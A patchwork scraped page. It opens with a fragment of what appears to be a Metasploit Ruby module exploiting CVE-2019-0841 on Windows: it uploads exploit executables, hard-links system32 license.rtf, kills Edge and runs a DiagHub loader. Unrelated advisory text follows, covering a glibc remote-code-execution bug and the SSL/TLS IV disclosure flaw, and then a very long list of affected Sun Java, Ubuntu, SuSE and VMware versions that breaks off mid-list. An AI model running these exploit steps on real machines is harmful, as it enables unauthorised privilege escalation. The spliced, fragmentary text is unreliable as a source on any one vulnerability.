exe_name = 'CVE-2019-0841_x64.exe'
f_name = 'diaghub_load_x64.exe'
end
link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
upload_file(exe_name, link_file_name)
@rtf_path = expand_path('%WINDIR%\\system32\\license.rtf')
fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name)
print_good('Successfully created hard link')
init_process
cmd_exec("taskkill /F /IM MicrosoftEdge.exe")
write_payload
diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}")
upload_file(f_name, diaghub_path)
cmd = "\"#{diaghub_path}\" \"license.rtf\""
cmd_exec(cmd)
end
def cleanup
folder_path = expand_path("%TEMP%\\etw")
dir_rm(folder_path)
write_file(@rtf_path, @original_data)
super
end
end
GNU glibc CVE-2019-1010023 Remote Code Execution Vulnerability
GNU glibc is prone to a remote code execution vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Exploit
The researcher has created a proof-of-concept to demonstrate the issue. Please see the references for more information.
References:
- glibc Homepage (GNU)
- GNU Homepage (GNU)
- Bug 22851 - ld library ELF load error (sourceware.org)
SSL/TLS Protocol Initialization Vector Implementation Information Disclosure Vulnerability
The SSL and TLS protocols are prone to an information disclosure vulnerability.
A man-in-the-middle attacker can exploit this issue to decrypt encrypted traffic. This will result in a false sense of security, and potentially result in the disclosure of sensitive information.
Information
Xerox FreeFlow Print Server (FFPS) 91.D2.32
Xerox FreeFlow Print Server (FFPS) 82.D1.44
Xerox FreeFlow Print Server (FFPS) 81.D0.73
Xerox FreeFlow Print Server (FFPS) 73.D2.33
Xerox FreeFlow Print Server (FFPS) 73.C5.11
VMWare VirtualCenter 2.5
VMWare vCenter 5.0
VMWare vCenter 4.1
VMWare vCenter 4.0
VMWare Update Manager 5.0
VMWare ESX 4.1
VMWare ESX 4.0
VMWare ESX 3.5
Ubuntu Ubuntu Linux 11.10 i386
Ubuntu Ubuntu Linux 11.10 amd64
Ubuntu Ubuntu Linux 11.04 powerpc
Ubuntu Ubuntu Linux 11.04 i386
Ubuntu Ubuntu Linux 11.04 ARM
Ubuntu Ubuntu Linux 11.04 amd64
Ubuntu Ubuntu Linux 10.10 powerpc
Ubuntu Ubuntu Linux 10.10 i386
Ubuntu Ubuntu Linux 10.10 ARM
Ubuntu Ubuntu Linux 10.10 amd64
Ubuntu Ubuntu Linux 10.04 sparc
Ubuntu Ubuntu Linux 10.04 powerpc
Ubuntu Ubuntu Linux 10.04 i386
Ubuntu Ubuntu Linux 10.04 ARM
Ubuntu Ubuntu Linux 10.04 amd64
SuSE SUSE Linux Enterprise Software Development Kit 11 SP1 for SP2
SuSE SUSE Linux Enterprise Software Development Kit 11 SP1
SuSE SUSE Linux Enterprise Server for VMware 11 SP1
SuSE SUSE Linux Enterprise Server 11 SP1 for SP2
SuSE SUSE Linux Enterprise Server 11 SP1
SuSE SUSE Linux Enterprise Server 10 SP4
SuSE SUSE Linux Enterprise SDK 11 SP1
SuSE SUSE Linux Enterprise Java 11 SP1
SuSE SUSE Linux Enterprise Java 10 SP4
SuSE SUSE Linux Enterprise for SAP Applications 11 SP1
SuSE Suse Linux Enterprise Desktop 10 SP4
Sun Solaris 11
Sun Solaris 10
Sun SDK (Windows Production Release) 1.4.2 _24
Sun SDK (Windows Production Release) 1.4.2 _15
Sun SDK (Windows Production Release) 1.4.2 _10
Sun SDK (Windows Production Release) 1.4.2 _09
Sun SDK (Windows Production Release) 1.4.2 _08
Sun SDK (Windows Production Release) 1.4.2 _07
Sun SDK (Windows Production Release) 1.4.2 _06
Sun SDK (Windows Production Release) 1.4.2 _05
Sun SDK (Windows Production Release) 1.4.2 _04
Sun SDK (Windows Production Release) 1.4.2 _03
Sun SDK (Windows Production Release) 1.4.2
Sun SDK (Windows Production Release) 1.4.1 _03
Sun SDK (Windows Production Release) 1.4.1 _02
Sun SDK (Windows Production Release) 1.4.1 _01
Sun SDK (Windows Production Release) 1.4.1
Sun SDK (Windows Production Release) 1.4 .0_4
Sun SDK (Windows Production Release) 1.4 .0_03
Sun SDK (Windows Production Release) 1.4 .0_02
Sun SDK (Windows Production Release) 1.4 .0_01
Sun SDK (Windows Production Release) 1.4
Sun SDK (Windows Production Release) 1.4.2_33
Sun SDK (Windows Production Release) 1.4.2_32
Sun SDK (Windows Production Release) 1.4.2_31
Sun SDK (Windows Production Release) 1.4.2_30
Sun SDK (Windows Production Release) 1.4.2_29
Sun SDK (Windows Production Release) 1.4.2_28
Sun SDK (Windows Production Release) 1.4.2_27
Sun SDK (Windows Production Release) 1.4.2_26
Sun SDK (Windows Production Release) 1.4.2_25
Sun SDK (Windows Production Release) 1.4.2_22
Sun SDK (Windows Production Release) 1.4.2_20
Sun SDK (Windows Production Release) 1.4.2_19
Sun SDK (Windows Production Release) 1.4.2_18
Sun SDK (Windows Production Release) 1.4.2_17
Sun SDK (Windows Production Release) 1.4.2_16
Sun SDK (Windows Production Release) 1.4.2_14
Sun SDK (Windows Production Release) 1.4.2_13
Sun SDK (Windows Production Release) 1.4.2_12
Sun SDK (Windows Production Release) 1.4.2_11
Sun SDK (Solaris Production Release) 1.4.2 _24
Sun SDK (Solaris Production Release) 1.4.2 _15
Sun SDK (Solaris Production Release) 1.4.2 _10
Sun SDK (Solaris Production Release) 1.4.2 _09
Sun SDK (Solaris Production Release) 1.4.2 _08
Sun SDK (Solaris Production Release) 1.4.2 _07
Sun SDK (Solaris Production Release) 1.4.2 _06
Sun SDK (Solaris Production Release) 1.4.2 _05
Sun SDK (Solaris Production Release) 1.4.2 _04
Sun SDK (Solaris Production Release) 1.4.2 _03
Sun SDK (Solaris Production Release) 1.4.2
Sun SDK (Solaris Production Release) 1.4.1 _03
Sun SDK (Solaris Production Release) 1.4.1 _02
Sun SDK (Solaris Production Release) 1.4.1 _01
Sun SDK (Solaris Production Release) 1.4.1
Sun SDK (Solaris Production Release) 1.4 .0_4
Sun SDK (Solaris Production Release) 1.4 .0_03
Sun SDK (Solaris Production Release) 1.4 .0_02
Sun SDK (Solaris Production Release) 1.4
Sun SDK (Solaris Production Release) 1.4.2_33
Sun SDK (Solaris Production Release) 1.4.2_32
Sun SDK (Solaris Production Release) 1.4.2_31
Sun SDK (Solaris Production Release) 1.4.2_30
Sun SDK (Solaris Production Release) 1.4.2_29
Sun SDK (Solaris Production Release) 1.4.2_28
Sun SDK (Solaris Production Release) 1.4.2_27
Sun SDK (Solaris Production Release) 1.4.2_26
Sun SDK (Solaris Production Release) 1.4.2_25
Sun SDK (Solaris Production Release) 1.4.2_22
Sun SDK (Solaris Production Release) 1.4.2_20
Sun SDK (Solaris Production Release) 1.4.2_19
Sun SDK (Solaris Production Release) 1.4.2_18
Sun SDK (Solaris Production Release) 1.4.2_17
Sun SDK (Solaris Production Release) 1.4.2_16
Sun SDK (Solaris Production Release) 1.4.2_14
Sun SDK (Solaris Production Release) 1.4.2_13
Sun SDK (Solaris Production Release) 1.4.2_12
Sun SDK (Solaris Production Release) 1.4.2_11
Sun SDK (Linux Production Release) 1.4.2 _24
Sun SDK (Linux Production Release) 1.4.2 _15
Sun SDK (Linux Production Release) 1.4.2 _10
Sun SDK (Linux Production Release) 1.4.2 _09
Sun SDK (Linux Production Release) 1.4.2 _08
Sun SDK (Linux Production Release) 1.4.2 _07
Sun SDK (Linux Production Release) 1.4.2 _06
Sun SDK (Linux Production Release) 1.4.2 _05
Sun SDK (Linux Production Release) 1.4.2 _04
Sun SDK (Linux Production Release) 1.4.2 _03
Sun SDK (Linux Production Release) 1.4.2 _02
Sun SDK (Linux Production Release) 1.4.2 _01
Sun SDK (Linux Production Release) 1.4.2
Sun SDK (Linux Production Release) 1.4.1 _03
Sun SDK (Linux Production Release) 1.4.1 _02
Sun SDK (Linux Production Release) 1.4.1 _01
Sun SDK (Linux Production Release) 1.4.1
Sun SDK (Linux Production Release) 1.4 .0_4
Sun SDK (Linux Production Release) 1.4 .0_03
Sun SDK (Linux Production Release) 1.4 .0_02
Sun SDK (Linux Production Release) 1.4
Sun SDK (Linux Production Release) 1.4.2_33
Sun SDK (Linux Production Release) 1.4.2_32
Sun SDK (Linux Production Release) 1.4.2_31
Sun SDK (Linux Production Release) 1.4.2_30
Sun SDK (Linux Production Release) 1.4.2_29
Sun SDK (Linux Production Release) 1.4.2_28
Sun SDK (Linux Production Release) 1.4.2_27
Sun SDK (Linux Production Release) 1.4.2_26
Sun SDK (Linux Production Release) 1.4.2_25
Sun SDK (Linux Production Release) 1.4.2_22
Sun SDK (Linux Production Release) 1.4.2_20
Sun SDK (Linux Production Release) 1.4.2_19
Sun SDK (Linux Production Release) 1.4.2_18
Sun SDK (Linux Production Release) 1.4.2_17
Sun SDK (Linux Production Release) 1.4.2_16
Sun SDK (Linux Production Release) 1.4.2_14
Sun SDK (Linux Production Release) 1.4.2_13
Sun SDK (Linux Production Release) 1.4.2_12
Sun SDK (Linux Production Release) 1.4.2_11
Sun SDK (Linux Production Release) 1.4.2 27
Sun SDK (Linux Production Release) 1.4.2 24
Sun SDK (Linux Production Release) 1.4.2 23
Sun SDK (Linux Production Release) 1.4.2 22
Sun SDK (Linux Production Release) 1.4.2 21
Sun SDK (Linux Production Release) 1.4.2 19
Sun JRE (Windows Production Release) 1.6 _17
Sun JRE (Windows Production Release) 1.6 _13
Sun JRE (Windows Production Release) 1.6 _12
Sun JRE (Windows Production Release) 1.6 _10
Sun JRE (Windows Production Release) 1.6 _07
Sun JRE (Windows Production Release) 1.6 _06
Sun JRE (Windows Production Release) 1.6 _05
Sun JRE (Windows Production Release) 1.6 _04
Sun JRE (Windows Production Release) 1.6
Sun JRE (Windows Production Release) 1.5 _22
Sun JRE (Windows Production Release) 1.5 _18
Sun JRE (Windows Production Release) 1.5 _16
Sun JRE (Windows Production Release) 1.5 _15
Sun JRE (Windows Production Release) 1.5 _06
Sun JRE (Windows Production Release) 1.5 _05
Sun JRE (Windows Production Release) 1.5 _04
Sun JRE (Windows Production Release) 1.5 _03
Sun JRE (Windows Production Release) 1.5 _02
Sun JRE (Windows Production Release) 1.5 _01
Sun JRE (Windows Production Release) 1.5
Sun JRE (Windows Production Release) 1.4.2 _28
Sun JRE (Windows Production Release) 1.4.2 _27
Sun JRE (Windows Production Release) 1.4.2 _24
Sun JRE (Windows Production Release) 1.4.2 _10
Sun JRE (Windows Production Release) 1.4.2 _09
Sun JRE (Windows Production Release) 1.4.2 _08
Sun JRE (Windows Production Release) 1.4.2 _07
Sun JRE (Windows Production Release) 1.4.2 _06
Sun JRE (Windows Production Release) 1.4.2 _05
Sun JRE (Windows Production Release) 1.4.2 _04
Sun JRE (Windows Production Release) 1.4.2 _03
Sun JRE (Windows Production Release) 1.4.2 _02
Sun JRE (Windows Production Release) 1.4.2 _01
Sun JRE (Windows Production Release) 1.4.2
Sun JRE (Windows Production Release) 1.4.1 _07
Sun JRE (Windows Production Release) 1.4.1 _03
Sun JRE (Windows Production Release) 1.4.1 _02
Sun JRE (Windows Production Release) 1.4.1 _01
Sun JRE (Windows Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.4 .0_04
Sun JRE (Windows Production Release) 1.4 .0_03
Sun JRE (Windows Production Release) 1.4 .0_02
Sun JRE (Windows Production Release) 1.4 .0_01
Sun JRE (Windows Production Release) 1.4
Sun JRE (Windows Production Release) 1.7
Sun JRE (Windows Production Release) 1.6.0_21
Sun JRE (Windows Production Release) 1.6.0_20
Sun JRE (Windows Production Release) 1.6.0_2
Sun JRE (Windows Production Release) 1.6.0_19
Sun JRE (Windows Production Release) 1.6.0_18
Sun JRE (Windows Production Release) 1.6.0_15
Sun JRE (Windows Production Release) 1.6.0_14
Sun JRE (Windows Production Release) 1.6.0_11
Sun JRE (Windows Production Release) 1.6.0_03
Sun JRE (Windows Production Release) 1.6.0_02
Sun JRE (Windows Production Release) 1.6.0_01
Sun JRE (Windows Production Release) 1.5.0_31
Sun JRE (Windows Production Release) 1.5.0_30
Sun JRE (Windows Production Release) 1.5.0_29
Sun JRE (Windows Production Release) 1.5.0_28
Sun JRE (Windows Production Release) 1.5.0_27
Sun JRE (Windows Production Release) 1.5.0_26
Sun JRE (Windows Production Release) 1.5.0_25
Sun JRE (Windows Production Release) 1.5.0_23
Sun JRE (Windows Production Release) 1.5.0_20
Sun JRE (Windows Production Release) 1.5.0_17
Sun JRE (Windows Production Release) 1.5.0_14
Sun JRE (Windows Production Release) 1.5.0_13
Sun JRE (Windows Production Release) 1.5.0_12
Sun JRE (Windows Production Release) 1.5.0_11
Sun JRE (Windows Production Release) 1.5.0_10
Sun JRE (Windows Production Release) 1.5.0_09-b03
Sun JRE (Windows Production Release) 1.5.0.0_09
Sun JRE (Windows Production Release) 1.5.0.0_08
Sun JRE (Windows Production Release) 1.5.0.0_07
Sun JRE (Windows Production Release) 1.4.2_33
Sun JRE (Windows Production Release) 1.4.2_32
Sun JRE (Windows Production Release) 1.4.2_31
Sun JRE (Windows Production Release) 1.4.2_30
Sun JRE (Windows Production Release) 1.4.2_29
Sun JRE (Windows Production Release) 1.4.2_25
Sun JRE (Windows Production Release) 1.4.2_22
Sun JRE (Windows Production Release) 1.4.2_20
Sun JRE (Windows Production Release) 1.4.2_19
Sun JRE (Windows Production Release) 1.4.2_18
Sun JRE (Windows Production Release) 1.4.2_17
Sun JRE (Windows Production Release) 1.4.2_16
Sun JRE (Windows Production Release) 1.4.2_15
Sun JRE (Windows Production Release) 1.4.2_14
Sun JRE (Windows Production Release) 1.4.2_13
Sun JRE (Windows Production Release) 1.4.2_12
Sun JRE (Windows Production Release) 1.4.2_11
Sun JRE (Solaris Production Release) 1.6 _17
Sun JRE (Solaris Production Release) 1.6 _13
Sun JRE (Solaris Production Release) 1.6 _12
Sun JRE (Solaris Production Release) 1.6 _10
Sun JRE (Solaris Production Release) 1.6 _07
Sun JRE (Solaris Production Release) 1.6 _06
Sun JRE (Solaris Production Release) 1.6 _05
Sun JRE (Solaris Production Release) 1.6 _04
Sun JRE (Solaris Production Release) 1.6
Sun JRE (Solaris Production Release) 1.5 _22
Sun JRE (Solaris Production Release) 1.5 _18
Sun JRE (Solaris Production Release) 1.5 _16
Sun JRE (Solaris Production Release) 1.5 _15
Sun JRE (Solaris Production Release) 1.5 _06
Sun JRE (Solaris Production Release) 1.5 _05
Sun JRE (Solaris Production Release) 1.5 _04
Sun JRE (Solaris Production Release) 1.5 _03
Sun JRE (Solaris Production Release) 1.5 _02
Sun JRE (Solaris Production Release) 1.5 _01
Sun JRE (Solaris Production Release) 1.5
Sun JRE (Solaris Production Release) 1.4.2 _24
Sun JRE (Solaris Production Release) 1.4.2 _10
Sun JRE (Solaris Production Release) 1.4.2 _09
Sun JRE (Solaris Production Release) 1.4.2 _08
Sun JRE (Solaris Production Release) 1.4.2 _07
Sun JRE (Solaris Production Release) 1.4.2 _06
Sun JRE (Solaris Production Release) 1.4.2 _05
Sun JRE (Solaris Production Release) 1.4.2 _04
Sun JRE (Solaris Production Release) 1.4.2 _03
Sun JRE (Solaris Production Release) 1.4.2 _02
Sun JRE (Solaris Production Release) 1.4.2 _01
Sun JRE (Solaris Production Release) 1.4.2
Sun JRE (Solaris Production Release) 1.4.1 _03
Sun JRE (Solaris Production Release) 1.4.1 _02
Sun JRE (Solaris Production Release) 1.4.1 _01
Sun JRE (Solaris Production Release) 1.4.1
Sun JRE (Solaris Production Release) 1.4 .0_04
Sun JRE (Solaris Production Release) 1.4 .0_03
Sun JRE (Solaris Production Release) 1.4 .0_02
Sun JRE (Solaris Production Release) 1.4 .0_01
Sun JRE (Solaris Production Release) 1.4
Sun JRE (Solaris Production Release) 1.7
Sun JRE (Solaris Production Release) 1.6.0_21
Sun JRE (Solaris Production Release) 1.6.0_2
Sun JRE (Solaris Production Release) 1.6.0_19
Sun JRE (Solaris Production Release) 1.6.0_18
Sun JRE (Solaris Production Release) 1.6.0_15
Sun JRE (Solaris Production Release) 1.6.0_14
Sun JRE (Solaris Production Release) 1.6.0_11
Sun JRE (Solaris Production Release) 1.6.0_03
Sun JRE (Solaris Production Release) 1.6.0_02
Sun JRE (Solaris Production Release) 1.6.0_01
Sun JRE (Solaris Production Release) 1.5.0_31
Sun JRE (Solaris Production Release) 1.5.0_30
Sun JRE (Solaris Production Release) 1.5.0_29
Sun JRE (Solaris Production Release) 1.5.0_28
Sun JRE (Solaris Production Release) 1.5.0_27
Sun JRE (Solaris Production Release) 1.5.0_26
Sun JRE (Solaris Production Release) 1.5.0_25
Sun JRE (Solaris Production Release) 1.5.0_23
Sun JRE (Solaris Production Release) 1.5.0_20
Sun JRE (Solaris Production Release) 1.5.0_17
Sun JRE (Solaris Production Release) 1.5.0_14
Sun JRE (Solaris Production Release) 1.5.0_13
Sun JRE (Solaris Production Release) 1.5.0_12
Sun JRE (Solaris Production Release) 1.5.0_11
Sun JRE (Solaris Production Release) 1.5.0_10
Sun JRE (Solaris Production Release) 1.5.0.0_09
Sun JRE (Solaris Production Release) 1.5.0.0_08
Sun JRE (Solaris Production Release) 1.5.0.0_07
Sun JRE (Solaris Production Release) 1.4.2_33
Sun JRE (Solaris Production Release) 1.4.2_32
Sun JRE (Solaris Production Release) 1.4.2_31
Sun JRE (Solaris Production Release) 1.4.2_30
Sun JRE (Solaris Production Release) 1.4.2_29
Sun JRE (Solaris Production Release) 1.4.2_28
Sun JRE (Solaris Production Release) 1.4.2_27
Sun JRE (Solaris Production Release) 1.4.2_25
Sun JRE (Solaris Production Release) 1.4.2_22
Sun JRE (Solaris Production Release) 1.4.2_20
Sun JRE (Solaris Production Release) 1.4.2_19
Sun JRE (Solaris Production Release) 1.4.2_18
Sun JRE (Solaris Production Release) 1.4.2_17
Sun JRE (Solaris Production Release) 1.4.2_16
Sun JRE (Solaris Production Release) 1.4.2_15
Sun JRE (Solaris Production Release) 1.4.2_14
Sun JRE (Solaris Production Release) 1.4.2_13
Sun JRE (Solaris Production Release) 1.4.2_12
Sun JRE (Solaris Production Release) 1.4.2_11
Sun JRE (Linux Production Release) 1.6 _17
Sun JRE (Linux Production Release) 1.6 _13
Sun JRE (Linux Production Release) 1.6 _12
Sun JRE (Linux Production Release) 1.6 _10
Sun JRE (Linux Production Release) 1.6 _07
Sun JRE (Linux Production Release) 1.6 _06
Sun JRE (Linux Production Release) 1.6 _05
Sun JRE (Linux Production Release) 1.6 _04
Sun JRE (Linux Production Release) 1.6
Sun JRE (Linux Production Release) 1.5 _22
Sun JRE (Linux Production Release) 1.5 _18
Sun JRE (Linux Production Release) 1.5 _16
Sun JRE (Linux Production Release) 1.5 _15
Sun JRE (Linux Production Release) 1.5 _07
Sun JRE (Linux Production Release) 1.5 _06
Sun JRE (Linux Production Release) 1.5 _05
Sun JRE (Linux Production Release) 1.5 _04
Sun JRE (Linux Production Release) 1.5 _03
Sun JRE (Linux Production Release) 1.5 _02
Sun JRE (Linux Production Release) 1.5 _01
Sun JRE (Linux Production Release) 1.5 .0 beta
Sun JRE (Linux Production Release) 1.5
Sun JRE (Linux Production Release) 1.4.2 _24
Sun JRE (Linux Production Release) 1.4.2 _21
Sun JRE (Linux Production Release) 1.4.2 _10-b03
Sun JRE (Linux Production Release) 1.4.2 _10
Sun JRE (Linux Production Release) 1.4.2 _09
Sun JRE (Linux Production Release) 1.4.2 _08
Sun JRE (Linux Production Release) 1.4.2 _07
Sun JRE (Linux Production Release) 1.4.2 _06
Sun JRE (Linux Production Release) 1.4.2 _05
Sun JRE (Linux Production Release) 1.4.2 _04
Sun JRE (Linux Production Release) 1.4.2 _03
Sun JRE (Linux Production Release) 1.4.2 _02
Sun JRE (Linux Production Release) 1.4.2 _01
Sun JRE (Linux Production Release) 1.4.2
Sun JRE (Linux Production Release) 1.4.1 _04
Sun JRE (Linux Production Release) 1.4.1 _03
Sun JRE (Linux Production Release) 1.4.1 _02
Sun JRE (Linux Production Release) 1.4.1 _01
Sun JRE (Linux Production Release) 1.4.1
Sun JRE (Linux Production Release) 1.7
Sun JRE (Linux Production Release) 1.6.0_21
Sun JRE (Linux Production Release) 1.6.0_20
Sun JRE (Linux Production Release) 1.6.0_19
Sun JRE (Linux Production Release) 1.6.0_18
Sun JRE (Linux Production Release) 1.6.0_15
Sun JRE (Linux Production Release) 1.6.0_14
Sun JRE (Linux Production Release) 1.6.0_11
Sun JRE (Linux Production Release) 1.6.0_03
Sun JRE (Linux Production Release) 1.6.0_02
Sun JRE (Linux Production Release) 1.6.0_01
Sun JRE (Linux Production Release) 1.5.0_31
Sun JRE (Linux Production Release) 1.5.0_30
Sun JRE (Linux Production Release) 1.5.0_29
Sun JRE (Linux Production Release) 1.5.0_28
Sun JRE (Linux Production Release) 1.5.0_27
Sun JRE (Linux Production Release) 1.5.0_26
Sun JRE (Linux Production Release) 1.5.0_25
Sun JRE (Linux Production Release) 1.5.0_23
Sun JRE (Linux Production Release) 1.5.0_20
Sun JRE (Linux Production Release) 1.5.0_17
Sun JRE (Linux Production Release) 1.5.0_14
Sun JRE (Linux Production Release) 1.5.0_13
Sun JRE (Linux Production Release) 1.5.0_12
Sun JRE (Linux Production Release) 1.5.0_11
Sun JRE (Linux Production Release) 1.5.0_10
Sun JRE (Linux Production Release) 1.5.0_09
Sun JRE (Linux Production Release) 1.5.0_08
Sun JRE (Linux Production Release) 1.4.2_33
Sun JRE (Linux Production Release) 1.4.2_32
Sun JRE (Linux Production Release) 1.4.2_31
Sun JRE (Linux Production Release) 1.4.2_30
Sun JRE (Linux Production Release) 1.4.2_29
Sun JRE (Linux Production Release) 1.4.2_28
Sun JRE (Linux Production Release) 1.4.2_27
Sun JRE (Linux Production Release) 1.4.2_25
Sun JRE (Linux Production Release) 1.4.2_22
Sun JRE (Linux Production Release) 1.4.2_20
Sun JRE (Linux Production Release) 1.4.2_19
Sun JRE (Linux Production Release) 1.4.2_18
Sun JRE (Linux Production Release) 1.4.2_17
Sun JRE (Linux Production Release) 1.4.2_16
Sun JRE (Linux Production Release) 1.4.2_15
Sun JRE (Linux Production Release) 1.4.2_14
Sun JRE (Linux Production Release) 1.4.2_13
Sun JRE (Linux Production Release) 1.4.2_12
Sun JRE (Linux Production Release) 1.4.2_11
Sun JDK (Windows Production Release) 1.6 _17
Sun JDK (Windows Production Release) 1.6 _14
Sun JDK (Windows Production Release) 1.6 _13
Sun JDK (Windows Production Release) 1.6 _11
Sun JDK (Windows Production Release) 1.6 _10
Sun JDK (Windows Production Release) 1.6 _07
Sun JDK (Windows Production Release) 1.6 _06
Sun JDK (Windows Production Release) 1.6 _05
Sun JDK (Windows Production Release) 1.6 _04
Sun JDK (Windows Production Release) 1.6
Sun JDK (Windows Production Release) 1.5 0_10
Sun JDK (Windows Production Release) 1.5 _22
Sun JDK (Windows Production Release) 1.5 _18
Sun JDK (Windows Production Release) 1.5 _17
Sun JDK (Windows Production Release) 1.5 _15
Sun JDK (Windows Production Release) 1.5 _14
Sun JDK (Windows Production Release) 1.5 _02
Sun JDK (Windows Production Release) 1.5 _01
Sun JDK (Windows Production Release) 1.5 .0_05
Sun JDK (Windows Production Release) 1.5 .0_04
Sun JDK (Windows Production Release) 1.5 .0_03
Sun JDK (Windows Production Release) 1.6.0_21
Sun JDK (Windows Production Release) 1.6.0_20
Sun JDK (Windows Production Release) 1.6.0_19
Sun JDK (Windows Production Release) 1.6.0_18
Sun JDK (Windows Production Release) 1.6.0_15
Sun JDK (Windows Production Release) 1.6.0_03
Sun JDK (Windows Production Release) 1.6.0_02
Sun JDK (Windows Production Release) 1.6.0_01-b06
Sun JDK (Windows Production Release) 1.6.0_01
Sun JDK (Windows Production Release) 1.5.0_31
Sun JDK (Windows Production Release) 1.5.0_30
Sun JDK (Windows Production Release) 1.5.0_29
Sun JDK (Windows Production Release) 1.5.0_28
Sun JDK (Windows Production Release) 1.5.0_27
Sun JDK (Windows Production Release) 1.5.0_26
Sun JDK (Windows Production Release) 1.5.0_25
Sun JDK (Windows Production Release) 1.5.0_24
Sun JDK (Windows Production Release) 1.5.0_23
Sun JDK (Windows Production Release) 1.5.0_20
Sun JDK (Windows Production Release) 1.5.0_16
Sun JDK (Windows Production Release) 1.5.0_13
Sun JDK (Windows Production Release) 1.5.0_12
Sun JDK (Windows Production Release) 1.5.0_11-b03
Sun JDK (Windows Production Release) 1.5.0_07-b03
Sun JDK (Windows Production Release) 1.5.0.0_12
Sun JDK (Windows Production Release) 1.5.0.0_11
Sun JDK (Windows Production Release) 1.5.0.0_09
Sun JDK (Windows Production Release) 1.5.0.0_08
Sun JDK (Windows Production Release) 1.5.0.0_06
Sun JDK (Solaris Production Release) 1.6 _17
Sun JDK (Solaris Production Release) 1.6 _14
Sun JDK (Solaris Production Release) 1.6 _13
Sun JDK (Solaris Production Release) 1.6 _11
Sun JDK (Solaris Production Release) 1.6 _10
Sun JDK (Solaris Production Release) 1.6 _07
Sun JDK (Solaris Production Release) 1.6 _06
Sun JDK (Solaris Production Release) 1.6 _05
Sun JDK (Solaris Production Release) 1.6 _04
Sun JDK (Solaris Production Release) 1.6 _01-b06
Sun JDK (Solaris Production Release) 1.6
Sun JDK (Solaris Production Release) 1.5 0_10
Sun JDK (Solaris Production Release) 1.5 0_09
Sun JDK (Solaris Production Release) 1.5 0_03
Sun JDK (Solaris Production Release) 1.5 _22
Sun JDK (Solaris Production Release) 1.5 _18
Sun JDK (Solaris Production Release) 1.5 _17
Sun JDK (Solaris Production Release) 1.5 _15
Sun JDK (Solaris Production Release) 1.5 _14
Sun JDK (Solaris Production Release) 1.5 _11-b03
Sun JDK (Solaris Production Release) 1.5 _07-b03
Sun JDK (Solaris Production Release) 1.5 _06
Sun JDK (Solaris Production Release) 1.5 _02
Sun JDK (Solaris Production Release) 1.5 _01
Sun JDK (Solaris Production Release) 1.5 .0_05
Sun JDK (Solaris Production Release) 1.5 .0_04
Sun JDK (Solaris Production Release) 1.5 .0_03
Sun JDK (Solaris Production Release) 1.6.0_21
Sun JDK (Solaris Production Release) 1.6.0_20
Sun JDK (Solaris Production Release) 1.6.0_19
Sun JDK (Solaris Production Release) 1.6.0_18
Sun JDK (Solaris Production Release) 1.6.0_15
Sun JDK (Solaris Production Release) 1.6.0_03
Sun JDK (Solaris Production Release) 1.6.0_02
Sun JDK (Solaris Production Release) 1.6.0_01
Sun JDK (Solaris Production Release) 1.5.0_31
Sun JDK (Solaris Production Release) 1.5.0_30
Sun JDK (Solaris Production Release) 1.5.0_29
Sun JDK (Solaris Production Release) 1.5.0_28
Sun JDK (Solaris Production Release) 1.5.0_27
Sun JDK (Solaris Production Release) 1.5.0_26
Sun JDK (Solaris Production Release) 1.5.0_25
Sun JDK (Solaris Production Release) 1.5.0_24
Sun JDK (Solaris Production Release) 1.5.0_23
Sun JDK (Solaris Production Release) 1.5.0_20
Sun JDK (Solaris Production Release) 1.5.0_16
Sun JDK (Solaris Production Release) 1.5.0_13
Sun JDK (Solaris Production Release) 1.5.0_12
Sun JDK (Solaris Production Release) 1.5.0_11
Sun JDK (Linux Production Release) 1.6 _17
Sun JDK (Linux Production Release) 1.6 _14
Sun JDK (Linux Production Release) 1.6 _13
Sun JDK (Linux Production Release) 1.6 _11
Sun JDK (Linux Production Release) 1.6 _10
Sun JDK (Linux Production Release) 1.6 _07
Sun JDK (Linux Production Release) 1.6 _06
Sun JDK (Linux Production Release) 1.6 _05
Sun JDK (Linux Production Release) 1.6 _04
Sun JDK (Linux Production Release) 1.6 _01-b06
Sun JDK (Linux Production Release) 1.6 _01
Sun JDK (Linux Production Release) 1.6
Sun JDK (Linux Production Release) 1.5 0_10
Sun JDK (Linux Production Release) 1.5 _22
Sun JDK (Linux Production Release) 1.5 _18
Sun JDK (Linux Production Release) 1.5 _17
Sun JDK (Linux Production Release) 1.5 _15
Sun JDK (Linux Production Release) 1.5 _14
Sun JDK (Linux Production Release) 1.5 _11-b03
Sun JDK (Linux Production Release) 1.5 _07-b03
Sun JDK (Linux Production Release) 1.5 _07
Sun JDK (Linux Production Release) 1.5 _06
Sun JDK (Linux Production Release) 1.5 _02
Sun JDK (Linux Production Release) 1.5 _01
Sun JDK (Linux Production Release) 1.5 .0_05
Sun JDK (Linux Production Release) 1.5
Sun JDK (Linux Production Release) 1.6.0_21
Sun JDK (Linux Production Release) 1.6.0_20
Sun JDK (Linux Production Release) 1.6.0_19
Sun JDK (Linux Production Release) 1.6.0_18
Sun JDK (Linux Production Release) 1.6.0_15
Sun JDK (Linux Production Release) 1.6.0_03
Sun JDK (Linux Production Release) 1.6.0_02
Sun JDK (Linux Production Release) 1.6.0 Update 7
Sun JDK (Linux Production Release) 1.6.0 Update 6
Sun JDK (Linux Production Release) 1.6.0 Update 5
Sun JDK (Linux Production Release) 1.6.0 Update 4
Sun JDK (Linux Production Release) 1.6.0 Update 3
Sun JDK (Linux Production Release) 1.6.0 Update 21
Sun JDK (Linux Production Release) 1.6.0 Update 20
Sun JDK (Linux Production Release) 1.6.0 Update 19
Sun JDK (Linux Production Release) 1.6.0 Update 18
Sun JDK (Linux Production Release) 1.6.0 Update 17
Sun JDK (Linux Production Release) 1.6.0 Update 16
Sun JDK (Linux Production Release) 1.6.0 Update 15
Sun JDK (Linux Production Release) 1.6.0 Update 14
Sun JDK (Linux Production Release) 1.6.0 Update 13
Sun JDK (Linux Production Release) 1.6.0 Update 12
Sun JDK (Linux Production Release) 1.6.0 Update 11
Sun JDK (Linux Production Release) 1.6.0 Update 10
Sun JDK (Linux Production Release) 1.5.0_31
Sun JDK (Linux Production Release) 1.5.0_30
Sun JDK (Linux Production Release) 1.5.0_29
Sun JDK (Linux Production Release) 1.5.0_28
Sun JDK (Linux Production Release) 1.5.0_27
